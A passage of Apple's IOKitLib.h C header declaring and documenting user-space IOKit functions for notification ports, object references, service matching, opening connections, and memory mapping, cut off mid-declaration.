Function names usually begin with the type of object they are compatible with - eg. IOObjectRelease can be used with any io_object_t. Inside the kernel, the c++ class hierarchy allows the subclasses of each object type to receive the same requests from user level clients, for example in the kernel, IOService is a subclass of IORegistryEntry, which means any of the IORegistryEntryXXX functions in IOKitLib may be used with io_service_t's as well as io_registry_t's. There are functions available to introspect the class of the kernel object which any io_object_t et al. represents.\n IOKit objects returned by all functions should be released with IOObjectRelease.\n */\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\ntypedef struct IONotificationPort * IONotificationPortRef;\n\n\n/*! @typedef IOServiceMatchingCallback\n @abstract Callback function to be notified of IOService publication.\n @param refcon The refcon passed when the notification was installed.\n @param iterator The notification iterator which now has new objects.\n */\ntypedef void\n(*IOServiceMatchingCallback)(\n                             void *            refcon,\n                             io_iterator_t        iterator );\n\n/*! @typedef IOServiceInterestCallback\n @abstract Callback function to be notified of changes in state of an IOService.\n @param refcon The refcon passed when the notification was installed.\n @param service The IOService whose state has changed.\n @param messageType A messageType enum, defined by IOKit/IOMessage.h or by the IOService's family.\n @param messageArgument An argument for the message, dependent on the messageType.  
If the message data is larger than sizeof(void*), then messageArgument contains a pointer to the message data; otherwise, messageArgument contains the message data.\n */\n\ntypedef void\n(*IOServiceInterestCallback)(\n                             void *            refcon,\n                             io_service_t        service,\n                             uint32_t        messageType,\n                             void *            messageArgument );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @const kIOMasterPortDefault\n @abstract The default mach port used to initiate communication with IOKit.\n @discussion When specifying a master port to IOKit functions, the NULL argument indicates \"use the default\". This is a synonym for NULL, if you'd rather use a named constant.\n */\n\nextern\nconst mach_port_t kIOMasterPortDefault;\n\n/*! @function IOMasterPort\n @abstract Returns the mach port used to initiate communication with IOKit.\n @discussion Functions that don't specify an existing object require the IOKit master port to be passed. This function obtains that port.\n @param bootstrapPort Pass MACH_PORT_NULL for the default.\n @param masterPort The master port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOMasterPort( mach_port_t    bootstrapPort,\n             mach_port_t *    masterPort );\n\n\n/*! @function IONotificationPortCreate\n @abstract Creates and returns a notification object for receiving IOKit notifications of new devices or state changes.\n @discussion Creates the notification object to receive notifications from IOKit of new device arrivals or state changes. The notification object can be supply a CFRunLoopSource, or mach_port_t to be used to listen for events.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A reference to the notification object. 
*/\n\nIONotificationPortRef\nIONotificationPortCreate(\n                         mach_port_t        masterPort );\n\n/*! @function IONotificationPortDestroy\n @abstract Destroys a notification object created with IONotificationPortCreate.\n Also destroys any mach_port's or CFRunLoopSources obatined from\n <code>@link IONotificationPortGetRunLoopSource @/link</code>\n or <code>@link IONotificationPortGetMachPort @/link</code>\n @param notify A reference to the notification object. */\n\nvoid\nIONotificationPortDestroy(\n                          IONotificationPortRef    notify );\n\n/*! @function IONotificationPortGetRunLoopSource\n @abstract Returns a CFRunLoopSource to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a CFRunLoop\n by adding the run loop source returned by this function to the run loop.\n \n The caller should not release this CFRunLoopSource. Just call\n <code>@link IONotificationPortDestroy @/link</code> to dispose of the\n IONotificationPortRef and the CFRunLoopSource when done.\n @param notify The notification object.\n @result A CFRunLoopSourceRef for the notification object. */\n\nCFRunLoopSourceRef\nIONotificationPortGetRunLoopSource(\n                                   IONotificationPortRef    notify );\n\n/*! @function IONotificationPortGetMachPort\n @abstract Returns a mach_port to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a mach messaging client\n if they listen for messages on the port obtained from this function.\n Callbacks associated with the notifications may be delivered by calling\n IODispatchCalloutFromMessage with messages received.\n \n The caller should not release this mach_port_t. Just call\n <code>@link IONotificationPortDestroy @/link</code> to dispose of the\n mach_port_t and IONotificationPortRef when done.\n @param notify The notification object.\n @result A mach_port for the notification object. 
*/\n\nmach_port_t\nIONotificationPortGetMachPort(\n                              IONotificationPortRef    notify );\n\n/*! @function IONotificationPortSetImportanceReceiver\n @abstract Configure a notification port to be an importance receiver.\n @discussion Sets the MACH_PORT_IMPORTANCE_RECEIVER attribute on the underlying mach port.\n Importance-donating messages sent to a notification port with this\n attribute enabled will boost the importance of the receiving process for the\n duration of the notification handler.\n @param notify The notification object.\n @result A kern_return_t error code. */\n\nkern_return_t\nIONotificationPortSetImportanceReceiver(\n                                        IONotificationPortRef    notify );\n\n/*! @function IONotificationPortSetDispatchQueue\n @abstract Sets a dispatch queue to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a dispatch client.\n @param notify The notification object.\n @param queue A dispatch queue. */\n\nvoid\nIONotificationPortSetDispatchQueue(\n                                   IONotificationPortRef notify, dispatch_queue_t queue )\n__OSX_AVAILABLE_STARTING(__MAC_10_6, __IPHONE_4_3);\n\n/*! @function IODispatchCalloutFromMessage\n @abstract Dispatches callback notifications from a mach message.\n @discussion A notification object may deliver notifications to a mach messaging client,\n which should call this function to generate the callbacks associated with the notifications arriving on the port.\n @param unused Not used, set to zero.\n @param msg A pointer to the message received.\n @param reference Pass the IONotificationPortRef for the object. */\n\nvoid\nIODispatchCalloutFromMessage(\n                             void             *unused,\n                             mach_msg_header_t    *msg,\n                             void            *reference );\n\n/*! 
@function IOCreateReceivePort\n @abstract Creates and returns a mach port suitable for receiving IOKit messages of the specified type.\n @discussion In the future IOKit may use specialized messages and ports\n instead of the standard ports created by mach_port_allocate(). Use this\n function instead of mach_port_allocate() to ensure compatibility with future\n revisions of IOKit.\n @param msgType Type of message to be sent to this port\n (kOSNotificationMessageID or kOSAsyncCompleteMessageID)\n @param recvPort The created port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOCreateReceivePort( uint32_t msgType, mach_port_t * recvPort );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOObject\n */\n\n/*! @function IOObjectRelease\n @abstract Releases an object handle previously returned by IOKitLib.\n @discussion All objects returned by IOKitLib should be released with this function when access to them is no longer needed. Using the object after it has been released may or may not return an error, depending on how many references the task has to the same object in the kernel.\n @param object The IOKit object to release.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRelease(\n                io_object_t    object );\n\n/*! @function IOObjectRetain\n @abstract Retains an object handle previously returned by IOKitLib.\n @discussion Gives the caller an additional reference to an existing object handle previously returned by IOKitLib.\n @param object The IOKit object to retain.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRetain(\n               io_object_t    object );\n\n/*! 
@function IOObjectGetClass\n @abstract Return the class name of an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the class the object is an instance of.\n @param object The IOKit object.\n @param className Caller allocated buffer to receive the name string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectGetClass(\n                 io_object_t    object,\n                 io_name_t    className );\n\n/*! @function IOObjectCopyClass\n @abstract Return the class name of an IOKit object.\n @discussion This function does the same thing as IOObjectGetClass, but returns the result as a CFStringRef.\n @param object The IOKit object.\n @result The resulting CFStringRef. This should be released by the caller. If a valid object is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopyClass(io_object_t object)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectCopySuperclassForClass\n @abstract Return the superclass name of the given class.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the superclass of the class.\n @param classname The name of the class as a CFString.\n @result The resulting CFStringRef. This should be released by the caller. If there is no superclass, or a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopySuperclassForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectCopyBundleIdentifierForClass\n @abstract Return the bundle identifier of the given class.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the kmod, which is the same as the bundle identifier.\n @param classname The name of the class as a CFString.\n @result The resulting CFStringRef. This should be released by the caller. 
If a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef\nIOObjectCopyBundleIdentifierForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectConformsTo\n @abstract Performs an OSDynamicCast operation on an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to determine if the object will dynamic cast to a class, specified as a C-string. In other words, if the object is of that class or a subclass.\n @param object An IOKit object.\n @param className The name of the class, as a C-string.\n @result If the object handle is valid, and represents an object in the kernel that dynamic casts to the class true is returned, otherwise false. */\n\nboolean_t\nIOObjectConformsTo(\n                   io_object_t    object,\n                   const io_name_t    className );\n\n/*! @function IOObjectIsEqualTo\n @abstract Checks two object handles to see if they represent the same kernel object.\n @discussion If two object handles are returned by IOKitLib functions, this function will compare them to see if they represent the same kernel object.\n @param object An IOKit object.\n @param anObject Another IOKit object.\n @result If both object handles are valid, and represent the same object in the kernel true is returned, otherwise false. */\n\nboolean_t\nIOObjectIsEqualTo(\n                  io_object_t    object,\n                  io_object_t    anObject );\n\n/*! @function IOObjectGetKernelRetainCount\n @abstract Returns kernel retain count of an IOKit object.\n @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level.\n @param object An IOKit object.\n @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. 
*/\n\nuint32_t\nIOObjectGetKernelRetainCount(\n                             io_object_t    object )\nAVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER;\n\n/*! @function IOObjectGetUserRetainCount\n @abstract Returns the retain count for the current process of an IOKit object.\n @discussion This function may be used in diagnostics to determine the current retain count for the calling process of the kernel object.\n @param object An IOKit object.\n @result If the object handle is valid, the objects user retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetUserRetainCount(\n                           io_object_t    object )\nAVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER;\n\n/*! @function IOObjectGetRetainCount\n @abstract Returns kernel retain count of an IOKit object. Identical to IOObjectGetKernelRetainCount() but available prior to Mac OS 10.6.\n @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level.\n @param object An IOKit object.\n @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetRetainCount(\n                       io_object_t    object );\n\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOIterator, subclass of IOObject\n */\n\n/*! @function IOIteratorNext\n @abstract Returns the next object in an iteration.\n @discussion This function returns the next object in an iteration, or zero if no more remain or the iterator is invalid.\n @param iterator An IOKit iterator handle.\n @result If the iterator handle is valid, the next element in the iteration is returned, otherwise zero is returned. The element should be released by the caller when it is finished. */\n\nio_object_t\nIOIteratorNext(\n               io_iterator_t    iterator );\n\n/*! 
@function IOIteratorReset\n @abstract Resets an iteration back to the beginning.\n @discussion If an iterator is invalid, or if the caller wants to start over, IOIteratorReset will set the iteration back to the beginning.\n @param iterator An IOKit iterator handle. */\n\nvoid\nIOIteratorReset(\n                io_iterator_t    iterator );\n\n/*! @function IOIteratorIsValid\n @abstract Checks an iterator is still valid.\n @discussion Some iterators will be made invalid if changes are made to the structure they are iterating over. This function checks the iterator is still valid and should be called when IOIteratorNext returns zero. An invalid iterator can be reset and the iteration restarted.\n @param iterator An IOKit iterator handle.\n @result True if the iterator handle is valid, otherwise false is returned. */\n\nboolean_t\nIOIteratorIsValid(\n                  io_iterator_t    iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService, subclass of IORegistryEntry\n */\n\n/*!\n @function IOServiceGetMatchingService\n @abstract Look up a registered IOService object that matches a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). 
Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @result The first service matched is returned on success. The service must be released by the caller.\n */\n\nio_service_t\nIOServiceGetMatchingService(\n                            mach_port_t    masterPort,\n                            CFDictionaryRef    matching CF_RELEASES_ARGUMENT);\n\n/*! @function IOServiceGetMatchingServices\n @abstract Look up registered IOService objects that match a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). 
IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param existing An iterator handle, or NULL, is returned on success, and should be released by the caller when the iteration is finished. If NULL is returned, the iteration was successful but found no matching services.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetMatchingServices(\n                             mach_port_t    masterPort,\n                             CFDictionaryRef    matching CF_RELEASES_ARGUMENT,\n                             io_iterator_t * existing );\n\n\nkern_return_t\nIOServiceAddNotification(\n                         mach_port_t    masterPort,\n                         const io_name_t    notificationType,\n                         CFDictionaryRef    matching,\n                         mach_port_t    wakePort,\n                         uintptr_t    reference,\n                         io_iterator_t *    notification )  DEPRECATED_ATTRIBUTE;\n\n/*! @function IOServiceAddMatchingNotification\n @abstract Look up registered IOService objects that match a matching dictionary, and install a notification request of new IOServices that match.\n @discussion This is the preferred method of finding IOService objects that may arrive at any time. The type of notification specifies the state change the caller is interested in, on IOService's that match the match dictionary. Notification types are identified by name, and are defined in IOKitKeys.h. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the armed notification is fired. When the notification is delivered, the io_iterator_t representing the notification should be iterated through to pick up all outstanding objects. 
When the iteration is finished the notification is rearmed. See IONotificationPortCreate.\n @param notificationType A notification type from IOKitKeys.h\n <br>    kIOPublishNotification Delivered when an IOService is registered.\n <br>    kIOFirstPublishNotification Delivered when an IOService is registered, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n <br>    kIOMatchedNotification Delivered when an IOService has had all matching drivers in the kernel probed and started.\n <br>    kIOFirstMatchNotification Delivered when an IOService has had all matching drivers in the kernel probed and started, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n <br>    kIOTerminatedNotification Delivered after an IOService has been terminated.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param callback A callback function called when the notification fires.\n @param refCon A reference constant for the callbacks use.\n @param notification An iterator handle is returned on success, and should be released by the caller when the notification is to be destroyed. The notification is armed when the iterator is emptied by calls to IOIteratorNext - when no more objects are returned, the notification is armed. Note the notification is not armed when first created.\n @result A kern_return_t error code. 
*/\n\nkern_return_t\nIOServiceAddMatchingNotification(\n                                 IONotificationPortRef    notifyPort,\n                                 const io_name_t        notificationType,\n                                 CFDictionaryRef        matching CF_RELEASES_ARGUMENT,\n                                 IOServiceMatchingCallback callback,\n                                 void *            refCon,\n                                 io_iterator_t *     notification );\n\n/*! @function IOServiceAddInterestNotification\n @abstract Register for notification of state changes in an IOService.\n @discussion IOService objects deliver notifications of their state changes to their clients via the IOService::messageClients API, and to other interested parties including callers of this function. Message types are defined IOKit/IOMessage.h.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the notification is fired. See IONotificationPortCreate.\n @param interestType A notification type from IOKitKeys.h\n <br>    kIOGeneralInterest General state changes delivered via the IOService::messageClients API.\n <br>    kIOBusyInterest Delivered when the IOService changes its busy state to or from zero. The message argument contains the new busy state causing the notification.\n @param callback A callback function called when the notification fires, with messageType and messageArgument for the state change.\n @param refCon A reference constant for the callbacks use.\n @param notification An object handle is returned on success, and should be released by the caller when the notification is to be destroyed.\n @result A kern_return_t error code. 
*/\n\nkern_return_t\nIOServiceAddInterestNotification(\n                                 IONotificationPortRef    notifyPort,\n                                 io_service_t        service,\n                                 const io_name_t     interestType,\n                                 IOServiceInterestCallback callback,\n                                 void *            refCon,\n                                 io_object_t *        notification );\n\n/*! @function IOServiceMatchPropertyTable\n @abstract Match an IOService object with a matching dictionary.\n @discussion This function calls the matching method of an IOService object and returns the boolean result.\n @param service The IOService object to match.\n @param matching A CF dictionary containing matching information. IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param matches The boolean result is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceMatchPropertyTable(\n                            io_service_t    service,\n                            CFDictionaryRef matching,\n                            boolean_t *    matches );\n\n/*! @function IOServiceGetBusyState\n @abstract Returns the busyState of an IOService.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is occurring on it or any of its clients.\n @param service The IOService whose busyState to return.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. 
*/\n\nkern_return_t\nIOServiceGetBusyState(\n                      io_service_t    service,\n                      uint32_t *    busyState );\n\n/*! @function IOServiceWaitQuiet\n @abstract Wait for an IOService's busyState to be zero.\n @discussion Blocks the caller until an IOService is non busy, see IOServiceGetBusyState.\n @param service The IOService to wait on.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOServiceWaitQuiet(\n                   io_service_t      service,\n                   mach_timespec_t * waitTime );\n\n/*! @function IOKitGetBusyState\n @abstract Returns the busyState of all IOServices.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is occurring on it or any of its clients. IOKitGetBusyState returns the busy state of the root of the service plane which reflects the busy state of all IOServices.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOKitGetBusyState(\n                  mach_port_t    masterPort,\n                  uint32_t *    busyState );\n\n/*! @function IOKitWaitQuiet\n @abstract Wait for all IOServices' busyState to be zero.\n @discussion Blocks the caller until all IOServices are non busy, see IOKitGetBusyState.\n @param masterPort The master port obtained from IOMasterPort(). 
Pass kIOMasterPortDefault to look up the default master port.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOKitWaitQuiet(\n               mach_port_t      masterPort,\n               mach_timespec_t * waitTime );\n\n/*! @function IOServiceOpen\n @abstract A request to create a connection to an IOService.\n @discussion A non kernel client may request a connection be opened via the IOServiceOpen() library function, which will call IOService::newUserClient in the kernel. The rules & capabilities of user level clients are family dependent, the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to open a connection to, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param owningTask The mach task requesting the connection.\n @param type A constant specifying the type of connection to be created,  interpreted only by the IOService's family.\n @param connect An io_connect_t handle is returned on success, to be used with the IOConnectXXX APIs. It should be destroyed with IOServiceClose().\n @result A return code generated by IOService::newUserClient. */\n\nkern_return_t\nIOServiceOpen(\n              io_service_t    service,\n              task_port_t    owningTask,\n              uint32_t    type,\n              io_connect_t  *    connect );\n\n/*! @function IOServiceRequestProbe\n @abstract A request to rescan a bus for device changes.\n @discussion A non kernel client may request a bus or controller rescan for added or removed devices, if the bus family does automatically notice such changes. For example, SCSI bus controllers do not notice device changes. 
The implementation of this routine is family dependent, and the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to request a rescan, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param options An options mask, interpreted only by the IOService's family.\n @result A return code generated by IOService::requestProbe. */\n\nkern_return_t\nIOServiceRequestProbe(\n                      io_service_t    service,\n                      uint32_t    options );\n\n// options for IOServiceAuthorize()\nenum {\n    kIOServiceInteractionAllowed    = 0x00000001\n};\n\n/*! @function IOServiceAuthorize\n @abstract Authorize access to an IOService.\n @discussion Determine whether this application is authorized to invoke IOServiceOpen() for a given IOService, either by confirming that it has been previously authorized by the user, or by soliciting the console user.\n @param service The IOService object to be authorized, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param options kIOServiceInteractionAllowed may be set to permit user interaction, if required.\n @result kIOReturnSuccess if the IOService is authorized, kIOReturnNotPermitted if the IOService is not authorized. */\n\nkern_return_t\nIOServiceAuthorize(\n                   io_service_t    service,\n                   uint32_t    options );\n\nint\nIOServiceOpenAsFileDescriptor(\n                              io_service_t    service,\n                              int        oflag );\n\n/* * * * * * * * * * * * * * *ff * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService connection\n */\n\n/*! 
@function IOServiceClose\n @abstract Close a connection to an IOService and destroy the connect handle.\n @discussion A connection created with IOServiceOpen should be closed with IOServiceClose when it is no longer needed.\n @param connect The connect handle created by IOServiceOpen. It will be destroyed by this function, and should not be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceClose(\n               io_connect_t    connect );\n\n/*! @function IOConnectAddRef\n @abstract Adds a reference to the connect handle.\n @discussion Adds a reference to the connect handle.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectAddRef(\n                io_connect_t    connect );\n\n/*! @function IOConnectRelease\n @abstract Remove a reference to the connect handle.\n @discussion Removes a reference to the connect handle.  If the last reference is removed an implicit IOServiceClose is performed.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectRelease(\n                 io_connect_t    connect );\n\n/*! @function IOConnectGetService\n @abstract Returns the IOService a connect handle was opened on.\n @discussion Finds the service object a connection was opened on.\n @param connect The connect handle created by IOServiceOpen.\n @param service On success, the service handle the connection was opened on, which should be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectGetService(\n                    io_connect_t    connect,\n                    io_service_t  *    service );\n\n/*! 
@function IOConnectSetNotificationPort\n @abstract Set a port to receive family specific notifications.\n @discussion This is a generic method to pass a mach port send right to be used by family specific notifications.\n @param connect The connect handle created by IOServiceOpen.\n @param type The type of notification requested, not interpreted by IOKit and family defined.\n @param port The port to which to send notifications.\n @param reference Some families may support passing a reference parameter for the caller's use with the notification.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectSetNotificationPort(\n                             io_connect_t    connect,\n                             uint32_t    type,\n                             mach_port_t    port,\n                             uintptr_t    reference );\n\n/*! @function IOConnectMapMemory\n @abstract Map hardware or shared memory into the caller's task.\n @discussion This is a generic method to create a mapping in the caller's task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n @param intoTask The task port for the task in which to create the mapping. This may be different to the task which opened the connection.\n @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing needs to be set on input. The address of the mapping created is passed back on success.\n @param ofSize The size of the mapping created is passed back on success.\n @result A kern_return_t error code. 
*/\n\n#if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6)\n\nkern_return_t\nIOConnectMapMemory(\n                   io_connect_t    connect,\n                   uint32_t    memoryType,\n                   task_port_t    intoTask,\n                   vm_address_t    *atAddress,\n                   vm_size_t    *ofSize,\n                   IOOptionBits     options );\n\n#else\n\nkern_return_t\nIOConnectMapMemory(\n                   io_connect_t        connect,\n                   uint32_t        memoryType,\n                   task_port_t        intoTask,\n                   mach_vm_address_t    *atAddress,\n                   mach_vm_size_t        *ofSize,\n                   IOOptionBits         options );\n\n#endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */\n\n\n/*! @function IOConnectMapMemory64\n @abstract Map hardware or shared memory into the caller's task.\n @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection.\n @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess.\n @param ofSize The size of the mapping created is passed back on success.\n @result A kern_return_t error code. 
*/\n\nkern_return_t IOConnectMapMemory64(\n                                   io_connect_t        connect,\n                                   uint32_t        memoryType,\n                                   task_port_t        intoTask,\n                                   mach_vm_address_t    *atAddress,\n                                   mach_vm_size_t        *ofSize,\n                                   IOOptionBits         options );\n\n/*! @function IOConnectUnmapMemory\n @abstract Remove a mapping made with IOConnectMapMemory.\n @discussion This is a generic method to remove a mapping in the callers task.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType The memory type originally requested in IOConnectMapMemory.\n @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection.\n @param atAddress The address of the mapping to be removed.\n @result A kern_return_t error code. */\n\n#if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6)\n\nkern_return_t\nIOConnectUnmapMemory(\n                     io_connect_t    connect,\n                     uint32_t    memoryType,\n                     task_port_t    fromTask,\n                     vm_address_t    atAddress );\n\n#else\n\nkern_return_t\nIOConnectUnmapMemory(\n                     io_connect_t    connect,\n                     uint32_t    memoryType,\n                     task_port_t    fromTask,\n                     mach_vm_address_t    atAddress );\n\n\n#endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */\n\n/*! @function IOConnectUnmapMemory64\n @abstract Remove a mapping made with IOConnectMapMemory64.\n @discussion This is a generic method to remove a mapping in the callers task.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType The memory type originally requested in IOConnectMapMemory.\n @param fromTask The task port for the task in which to remove the mapping. 
This may be different to the task which the opened the connection.\n @param atAddress The address of the mapping to be removed.\n @result A kern_return_t error code. */\n\nkern_return_t IOConnectUnmapMemory64(\n                                     io_connect_t        connect,\n                                     uint32_t        memoryType,\n                                     task_port_t        fromTask,\n                                     mach_vm_address_t    atAddress );\n\n\n/*! @function IOConnectSetCFProperties\n @abstract Set CF container based properties on a connection.\n @discussion This is a generic method to pass a CF container of properties to the connection. The properties are interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectSetCFProperties(\n                         io_connect_t    connect,\n                         CFTypeRef    properties );\n\n/*! @function IOConnectSetCFProperty\n @abstract Set a CF container based property on a connection.\n @discussion This is a generic method to pass a CF property to the connection. 
The property is interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIOConnectSetCFProperty(\n                       io_connect_t    connect,\n                       CFStringRef    propertyName,\n                       CFTypeRef    property );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// Combined LP64 & ILP32 Extended IOUserClient::externalMethod\n\nkern_return_t\nIOConnectCallMethod(\n                    mach_port_t     connection,        // In\n                    uint32_t     selector,        // In\n                    const uint64_t    *input,            // In\n                    uint32_t     inputCnt,        // In\n                    const void      *inputStruct,        // In\n                    size_t         inputStructCnt,    // In\n                    uint64_t    *output,        // Out\n                    uint32_t    *outputCnt,        // In/Out\n                    void        *outputStruct,        // Out\n                    size_t        *outputStructCnt)    // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncMethod(\n                         mach_port_t     connection,        // In\n                         uint32_t     selector,        // In\n                         mach_port_t     wake_port,        // In\n                         uint64_t    *reference,        // In\n                         uint32_t     referenceCnt,        // In\n                       
